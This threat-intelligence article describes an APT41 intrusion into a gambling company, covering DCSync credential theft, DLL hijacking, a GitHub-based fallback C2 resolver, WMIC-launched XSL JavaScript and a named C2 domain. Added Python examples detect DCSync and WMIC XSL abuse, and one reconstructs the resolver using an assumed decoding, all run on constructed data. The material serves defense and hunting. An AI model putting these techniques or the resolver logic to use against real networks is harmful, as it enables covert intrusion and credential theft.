The highly active Chinese state-sponsored group known as APT41, also referred to as Brass Typhoon or Wicked Panda, has been linked to a complex cyber operation that specifically targets the gambling and gaming sectors.

According to Ido Naor, CEO and co-founder of the cybersecurity firm Security Joes, the attackers stealthily collected critical data from the targeted organization over a span of six months, including network configurations, user credentials, and information from the LSASS process, he said in a statement to The Hacker News.

Naor added that during the breach the intruders continually refined their tooling in response to the security team's actions, monitoring the defenders and adjusting their techniques to evade detection and retain access to the compromised network.

The multi-stage attack, which focused on a single client and spanned nearly nine months, overlaps with a separate set of intrusions that Sophos tracks as Operation Crimson Palace.

Naor said that Security Joes began responding to the incident four months ago, and emphasized that such attacks are typically driven by decisions made by state actors. He expressed a strong belief that, in this instance, APT41 was after financial gain.

The operation was built around stealth, combining several techniques to reach its objectives. The attackers relied on a custom toolset designed not only to bypass the security controls in place but also to collect critical data and open covert channels for long-term remote access.

Security Joes characterized APT41 as "highly skilled and systematic," noting its ability to run espionage operations as well as supply-chain compromises, which lead to intellectual property theft and financially motivated activity such as ransomware and cryptocurrency mining.

The precise initial access vector remains unknown, but spear-phishing emails are suspected, since no actively exploitable vulnerabilities were found in the organization's public-facing web applications.

Once inside, the attackers performed a DCSync attack, abusing Active Directory replication rights to request password hashes for service and administrator accounts directly from a domain controller, thereby escalating their privileges. With these credentials they established persistent control over the network, focusing on administrative and developer accounts.
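To show what the DCSync activity described above looks like from the defender's side, here is an added detection example in Python, written for this page and not taken from Security Joes or the original report. It walks constructed Windows Security event 4662 records and flags requests for the DS-Replication-Get-Changes family of extended rights (identified by their documented GUIDs) coming from any account that is neither a domain controller computer account nor on an explicit replication allowlist. The account names, DC names and event records are made up; svc_aadconnect stands in for a hypothetical directory-sync service account that legitimately replicates.

```python
from dataclasses import dataclass
from typing import List, Optional, Set

# Extended-rights GUIDs that a DCSync needs on the domain naming context.
# These are Microsoft's documented control-access rights, not values from the page.
REPL_GET_CHANGES      = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"  # DS-Replication-Get-Changes
REPL_GET_CHANGES_ALL  = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"  # DS-Replication-Get-Changes-All
REPL_GET_CHANGES_FILT = "89e95b76-444d-4c62-991a-0facbeda640c"  # DS-Replication-Get-Changes-In-Filtered-Set
REPLICATION_RIGHTS = {REPL_GET_CHANGES, REPL_GET_CHANGES_ALL, REPL_GET_CHANGES_FILT}

CONTROL_ACCESS = 0x100  # AccessMask bit for "Control Access" in event 4662


@dataclass
class Event4662:
    subject: str            # SubjectUserName
    object_type: str        # object class name (raw logs carry a GUID here)
    properties: List[str]   # GUIDs listed under Properties
    access_mask: int        # AccessMask


# Constructed inventory for a fictional domain (assumptions, not real data).
DOMAIN_CONTROLLERS: Set[str] = {"DC01$", "DC02$"}
REPLICATION_ALLOWLIST: Set[str] = {"svc_aadconnect"}  # hypothetical directory-sync account

# Constructed events, not real logs.
SAMPLE_EVENTS = [
    Event4662("DC02$", "domainDNS", [REPL_GET_CHANGES, REPL_GET_CHANGES_ALL], 0x100),   # normal DC replication
    Event4662("svc_aadconnect", "domainDNS", [REPL_GET_CHANGES, REPL_GET_CHANGES_ALL], 0x100),  # allowlisted sync
    Event4662("jdoe", "domainDNS", [REPL_GET_CHANGES, REPL_GET_CHANGES_ALL], 0x100),    # user account replicating
    Event4662("svc_backup", "domainDNS", ["{" + REPL_GET_CHANGES_ALL + "}"], 0x100),   # braces, as raw logs show
    Event4662("jdoe", "user", ["11111111-2222-3333-4444-555555555555"], 0x10),         # placeholder read, not replication
]


def _normalize(guid: str) -> str:
    """Raw 4662 Properties wrap GUIDs in braces and vary in case; normalize for lookup."""
    return guid.strip().strip("{}").lower()


def is_dcsync_candidate(ev: Event4662, dcs: Set[str], allowlist: Set[str]) -> bool:
    """True when a non-DC, non-allowlisted account exercised a replication right."""
    if ev.access_mask & CONTROL_ACCESS == 0:
        return False
    if not ({_normalize(p) for p in ev.properties} & REPLICATION_RIGHTS):
        return False
    return ev.subject not in dcs and ev.subject not in allowlist


def find_dcsync(events: List[Event4662],
                dcs: Optional[Set[str]] = None,
                allowlist: Optional[Set[str]] = None) -> List[str]:
    """Subject names of every event that looks like a DCSync, in log order."""
    dcs = DOMAIN_CONTROLLERS if dcs is None else dcs
    allowlist = REPLICATION_ALLOWLIST if allowlist is None else allowlist
    return [ev.subject for ev in events if is_dcsync_candidate(ev, dcs, allowlist)]


if __name__ == "__main__":
    for subject in find_dcsync(SAMPLE_EVENTS):
        print("possible DCSync by", subject)
```

Two caveats for real use: event 4662 only exists if directory-service access auditing (with Control Access) is enabled on the domain object, and a DCSync run under a compromised domain controller computer account passes this filter, so correlate the subject with the source host as well.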

The intruders reportedly carried out reconnaissance and post-exploitation tasks methodically, repeatedly adjusting their tools in response to the defensive measures applied against them, with the ultimate aim of downloading and executing additional payloads.

Techniques used to this end included phantom DLL hijacking (planting a DLL under a name that a legitimate process searches for but that does not otherwise exist on the system) and abuse of legitimate tools such as wmic.exe, combined with their access to privileged service accounts to trigger execution.

The next phase involved a malicious DLL named TSVIPSrv.dll, which was retrieved over SMB. Once loaded, the payload contacted a hard-coded command-and-control (C2) server.

If the hard-coded C2 server was unreachable, the malware attempted to obtain updated C2 details by issuing specific search queries to GitHub and extracting user-supplied content from the results.

The malware parsed the HTML returned by these GitHub searches, looking for sequences of capitalized words. It collected eight such words and kept only their uppercase letters that fall between A and P, yielding an 8-character string that encodes the IP address of the new C2 server.
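An added example, not code from the original report, that implements the fallback-C2 derivation as the page describes it: reduce the GitHub result page to its visible text, walk the capitalized words in order, keep the leading capital of each word when it lies in A..P, stop at eight letters and decode. The page does not say how eight letters become an IP address; the mapping used here, A..P onto hexadecimal 0..F so that eight letters give the four octets of an IPv4 address, is an assumption that fits the description, as is the choice to skip words beginning with Q..Z rather than abort. The HTML fragment is constructed and 203.0.113.7 is a documentation address.

```python
import re
from html.parser import HTMLParser
from typing import List, Optional

# Assumed decoding alphabet: sixteen letters, one hex digit each (A=0 ... P=15).
LETTERS = "ABCDEFGHIJKLMNOP"

# Constructed GitHub-like result fragment (not a real capture). Noise is deliberate:
# a script block containing capitalized words, an all-caps token, and words that
# start with letters outside A..P.
SAMPLE_HTML = """
<html><head><title>Search results</title>
<script>var Ignored = "Xray";</script></head>
<body>
<p>Zebra notes: Mango Lemon Apple Apricot</p>
<p>README file, Honey Berry Anchor Hazel Quince</p>
</body></html>
"""


class _TextExtractor(HTMLParser):
    """Collect visible text, dropping anything inside <script> or <style>."""

    def __init__(self) -> None:
        super().__init__()
        self._skip = 0
        self.chunks: List[str] = []

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip += 1

    def handle_endtag(self, tag):
        if tag in ("script", "style") and self._skip:
            self._skip -= 1

    def handle_data(self, data):
        if not self._skip:
            self.chunks.append(data)


def visible_text(html: str) -> str:
    parser = _TextExtractor()
    parser.feed(html)
    parser.close()
    return " ".join(parser.chunks)


# A "capitalized word": one uppercase letter followed by lowercase letters.
# All-caps tokens such as README and single capitals do not qualify.
CAP_WORD = re.compile(r"\b([A-Z])[a-z]+\b")


def capitalized_letters(text: str) -> List[str]:
    """Leading capital of every capitalized word, in document order."""
    return CAP_WORD.findall(text)


def decode_c2(html: str, needed: int = 8) -> Optional[str]:
    """
    Derive a dotted-quad IPv4 address from the page: keep the initial capital of
    each capitalized word if it is in A..P (words starting Q..Z are skipped, an
    assumption), stop after `needed` letters, map A..P to hex 0..F and pair the
    digits into octets. Returns None when the page carries too few usable letters.
    """
    picked = [c for c in capitalized_letters(visible_text(html)) if c in LETTERS][:needed]
    if len(picked) < needed:
        return None
    hexdigits = "".join(format(LETTERS.index(c), "x") for c in picked)
    octets = [int(hexdigits[i:i + 2], 16) for i in range(0, len(hexdigits), 2)]
    return ".".join(str(o) for o in octets)


if __name__ == "__main__":
    print("letters:", capitalized_letters(visible_text(SAMPLE_HTML)))
    print("fallback C2:", decode_c2(SAMPLE_HTML))
```

For defenders the useful consequence is that the resolver needs nothing more than ordinary HTTPS requests to github.com, so proxy logs showing GitHub search traffic from a host that has no developer tooling, immediately after a failed connection to another address, are a better hunting lead than the hard-coded C2 itself.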

Communication with the C2 server enables detailed profiling of the compromised host and the download of additional malware over socket connections.

Security Joes observed that the threat actors went quiet for several weeks after their activity was detected, then returned with a changed approach: heavily obfuscated JavaScript embedded in a modified XSL file.

The XSL file was loaded indirectly through the WMIC command, which processes the stylesheet and in doing so executes the JavaScript the attackers planted in it.
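The WMIC-and-XSL step above is a well-known technique (MITRE ATT&CK T1220, XSL Script Processing): wmic.exe's /format: switch accepts an arbitrary stylesheet, local or remote, and the XSL processor runs any script the stylesheet contains. Below is an added hunting example in Python, not from the original report, that scans constructed process-creation records (image path plus command line, as Sysmon event 1 or Security event 4688 would provide) for wmic.exe invocations whose /format target is not one of the stock stylesheet names. The paths and URLs in the sample records are invented placeholders; the allowlist of stock format keywords is mine and may need extending for a given environment.

```python
import re
from typing import Dict, List, Optional, Tuple

# Format keywords that ship with WMIC; each resolves to an .xsl under
# %SystemRoot%\System32\wbem. Compiled from a stock install, not from the page.
BUILTIN_FORMATS = {
    "list", "table", "csv", "hform", "htable", "mof",
    "rawxml", "texttable", "textvaluelist", "value", "xml",
}
WBEM_DIR = "\\system32\\wbem\\"

# /format:value  or  /format:"value with spaces"  (switch is case-insensitive)
FORMAT_ARG = re.compile(r'/format:(?:"([^"]*)"|(\S+))', re.IGNORECASE)

# Constructed process-creation records (not real telemetry). Placeholder paths/URLs.
SAMPLE_PROCESS_EVENTS: List[Dict[str, str]] = [
    {"image": r"C:\Windows\System32\wbem\WMIC.exe",
     "command_line": r"wmic.exe os get Caption,Version /format:list"},
    {"image": r"C:\Windows\System32\wbem\WMIC.exe",
     "command_line": r'wmic.exe process list /format:"C:\Users\Public\report.xsl"'},
    {"image": r"C:\Windows\System32\wbem\WMIC.exe",
     "command_line": r"WMIC OS GET /FORMAT:https://example.invalid/a.xsl"},
    {"image": r"C:\Windows\System32\wbem\WMIC.exe",
     "command_line": r'wmic.exe os get /format:"C:\Windows\System32\wbem\en-US\csv.xsl"'},
    {"image": r"C:\Windows\System32\notepad.exe",
     "command_line": r"notepad.exe /format:notes.xsl"},   # not wmic, must be ignored
]


def format_target(cmdline: str) -> Optional[str]:
    """Return the unquoted value passed to /format:, or None if the switch is absent."""
    m = FORMAT_ARG.search(cmdline)
    if not m:
        return None
    return m.group(1) if m.group(1) is not None else m.group(2)


def classify_format(value: str) -> Optional[str]:
    """Reason the /format target looks attacker-supplied, or None if it is benign."""
    v = value.strip().lower()
    if v in BUILTIN_FORMATS:
        return None
    if "://" in v:
        return "remote XSL fetched over the network"
    if WBEM_DIR in v:
        return None  # explicit path to a stock stylesheet
    if v.endswith(".xsl") or "\\" in v or "/" in v:
        return "local XSL outside the wbem directory"
    return "unrecognized format keyword"


def hunt_wmic_xsl(records: List[Dict[str, str]]) -> List[Tuple[str, str]]:
    """(command line, reason) for every wmic.exe launch with a suspicious /format target."""
    hits: List[Tuple[str, str]] = []
    for rec in records:
        if not rec["image"].lower().endswith("wmic.exe"):
            continue
        target = format_target(rec["command_line"])
        if target is None:
            continue
        reason = classify_format(target)
        if reason:
            hits.append((rec["command_line"], reason))
    return hits


if __name__ == "__main__":
    for cmd, why in hunt_wmic_xsl(SAMPLE_PROCESS_EVENTS):
        print(f"{why}: {cmd}")
```

Because the check is an allowlist, a stock format name or an explicit path under System32\wbem passes, while every other target, including unfamiliar keywords, is surfaced for review; a stylesheet sitting in a user-writable directory or fetched over HTTP is exactly the case this page describes.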

The JavaScript acted as a downloader, using the domain time.qnapntp.com as its C2 server to fetch a follow-on payload that collects system fingerprint data and sends it back to the server, with filtering so that only systems of interest to the attackers are reported.

Notably, the code only proceeds on systems whose IP address contains the substring '10.20.22' (a plain substring check, so it would also match addresses such as 10.20.220.x), demonstrating the attackers' intent to single out assets in a specific subnet. Correlating this with network logs and the IP addresses of the affected devices showed that the filter was used to target devices in the VPN subnet exclusively.
